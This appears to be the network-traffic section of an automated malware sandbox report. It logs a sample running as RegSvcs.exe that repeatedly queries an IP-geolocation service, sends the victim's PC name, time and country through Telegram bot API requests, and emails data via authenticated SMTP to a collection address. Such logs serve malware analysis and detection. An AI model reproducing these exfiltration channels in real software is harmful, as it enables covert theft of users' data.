                                                  2024-09-18 13:26:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.749724188.114.96.34433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:21 UTC710INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:21 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78332
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0hSWUzoGZaswoAbca0utCWF0ugx%2BEw739gG0Y5VWtmV1Kx48vSps%2BT2K6rNBay9Mte7tPkJjdmquQ0Q8pzUjeVXwYGNU3tKQGKKx%2BPZ9VK4DvjtKU43au1b%2BehS0%2FuLf4dYDQXF"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aacec9fcc466-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:21 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.749726149.154.167.2204433636C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:22 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:22 UTC344INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0
                                                  Date: Wed, 18 Sep 2024 13:26:22 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 55
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-18 13:26:22 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.749727188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:23 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:23 UTC704INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:23 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78334
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Lx2BlQjSLnMR15cuyh8fY64yiXLRqOUKfV0HZciD8Y4iOkTplGeOytigIxzQAQJbjJQi7o6AD422FGv2yf3ZbdYV4iN6kRFP%2BP3eV8ZACOp2vMFolskv2d9AEat0g%2FAnPT909KD"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aadf4a267ced-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.749729188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:25 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:26 UTC712INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:25 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78336
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGIFbMfim7BjNk9QQJbIKyQbPEeewE%2Bp3Ufy%2FeDcvX%2FddulasubAUhhtR5XXcrdu9V4o6FG8OXp7nwv1Dh5LXutV%2BjCs0ki8m8y0AuvtAdq7nhSEvOx5I%2Bs6aFvgxxcAFapH7ZP%2F"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aaec4dcd43ef-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:26 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.749731188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:28 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:28 UTC708INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:28 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78339
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kJ9o4fNWfPIkluNwBfcQWnh9W%2BdaMfSth2Wl%2F8h6YDObriwyQY3cMga%2FQCXGirQuciLzfZO1WgSKFMz0FSCIVEdyBeZbHSM994xTtWzJJFsTBvx5O3K6I7%2F2xCOXXN9L8kWpfqCx"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aafb58c08c0b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.749734188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:31 UTC714INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:31 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78342
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BuDGESx0ndL8b1x%2F8C3Tlh4SHqJg5Zc5%2BquK%2BKUwgO7lASjKnlU3tC8vc1oenJ7W%2FTiZRavHxhHKRtfFbFXJ%2FCWtppnWXhPaMzbLRKn%2BqGcfqWXujvrGEYaqcM9Wpi4aKtuWGdNm"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51ab0c09691978-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.749736188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:32 UTC708INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:32 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78343
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bttsZdslEQbj6yZausgr0mYanMlrmegdMJwKFJkhomfoTLhJR8vtiPkLG1TWyaOWhUpDD28tN0B5%2BcLbv1VSyopW%2BI3DQgm6Y7kAomavlGCnb9DSWrJgAxf4VWCMRCzlghY62%2BJ%2F"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51ab14e93817f1-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.749738188.114.96.34436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:34 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:35 UTC706INHTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:35 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78346
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qGAwaMSCpN0oThg6%2F45MFKNR4dwA2D3q7X0xlreaWXZ9knGSlGs05GW6tHEtuuT9%2BvuyGG8B77sZT8CHHoDQ5dHMEZSpFD%2FYLWZ8mCOC4twZOZsr4aTYvoEGQzZsSrjMGEqDgyyX"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51ab24b86d42fe-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.749739149.154.167.2204436480C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-18 13:26:35 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2004:52:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:35 UTC344INHTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0
                                                  Date: Wed, 18 Sep 2024 13:26:35 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 55
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-18 13:26:35 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                  SMTP Packets

                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Sep 18, 2024 15:26:31.248635054 CEST58749732208.91.198.143192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                  Sep 18, 2024 15:26:31.248863935 CEST49732587192.168.2.7208.91.198.143EHLO 675052
                                                  Sep 18, 2024 15:26:31.403965950 CEST58749732208.91.198.143192.168.2.7250-us2.outbound.mailhostbox.com
                                                  250-PIPELINING
                                                  250-SIZE 41648128
                                                  250-VRFY
                                                  250-ETRN
                                                  250-STARTTLS
                                                  250-AUTH PLAIN LOGIN
                                                  250-AUTH=PLAIN LOGIN
                                                  250-ENHANCEDSTATUSCODES
                                                  250-8BITMIME
                                                  250-DSN
                                                  250 CHUNKING
                                                  Sep 18, 2024 15:26:31.409096956 CEST49732587192.168.2.7208.91.198.143AUTH login d2V0aGVtQGFrbGFuZWFoLXNhLmNvbQ==
                                                  Sep 18, 2024 15:26:31.579674959 CEST58749732208.91.198.143192.168.2.7334 UGFzc3dvcmQ6
                                                  Sep 18, 2024 15:26:31.740420103 CEST58749732208.91.198.143192.168.2.7235 2.7.0 Authentication successful
                                                  Sep 18, 2024 15:26:31.740645885 CEST49732587192.168.2.7208.91.198.143MAIL FROM:<wethem@aklaneah-sa.com>
                                                  Sep 18, 2024 15:26:31.896560907 CEST58749732208.91.198.143192.168.2.7250 2.1.0 Ok
                                                  Sep 18, 2024 15:26:31.896810055 CEST49732587192.168.2.7208.91.198.143RCPT TO:<resultlog62@gmail.com>
                                                  Sep 18, 2024 15:26:32.392853975 CEST58749732208.91.198.143192.168.2.7250 2.1.5 Ok
                                                  Sep 18, 2024 15:26:32.393096924 CEST49732587192.168.2.7208.91.198.143DATA
                                                  Sep 18, 2024 15:26:32.394371986 CEST58749732208.91.198.143192.168.2.7250 2.1.5 Ok
                                                  Sep 18, 2024 15:26:32.549065113 CEST58749732208.91.198.143192.168.2.7354 End data with <CR><LF>.<CR><LF>
                                                  Sep 18, 2024 15:26:32.550303936 CEST49732587192.168.2.7208.91.198.143.
                                                  Sep 18, 2024 15:26:32.937063932 CEST58749732208.91.198.143192.168.2.7250 2.0.0 Ok: queued as 00F5AB808A3
                                                  Sep 18, 2024 15:26:42.476718903 CEST58749740208.91.198.143192.168.2.7220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                  Sep 18, 2024 15:26:42.476996899 CEST49740587192.168.2.7208.91.198.143EHLO 675052
                                                  Sep 18, 2024 15:26:42.632097960 CEST58749740208.91.198.143192.168.2.7250-us2.outbound.mailhostbox.com
                                                  250-PIPELINING
                                                  250-SIZE 41648128
                                                  250-VRFY
                                                  250-ETRN
                                                  250-STARTTLS
                                                  250-AUTH PLAIN LOGIN
                                                  250-AUTH=PLAIN LOGIN
                                                  250-ENHANCEDSTATUSCODES
                                                  250-8BITMIME
                                                  250-DSN
                                                  250 CHUNKING
                                                  Sep 18, 2024 15:26:42.632476091 CEST49740587192.168.2.7208.91.198.143AUTH login d2V0aGVtQGFrbGFuZWFoLXNhLmNvbQ==
                                                  Sep 18, 2024 15:26:42.792351007 CEST58749740208.91.198.143192.168.2.7334 UGFzc3dvcmQ6
                                                  Sep 18, 2024 15:26:43.024652958 CEST58749740208.91.198.143192.168.2.7235 2.7.0 Authentication successful
                                                  Sep 18, 2024 15:26:43.024918079 CEST49740587192.168.2.7208.91.198.143MAIL FROM:<wethem@aklaneah-sa.com>
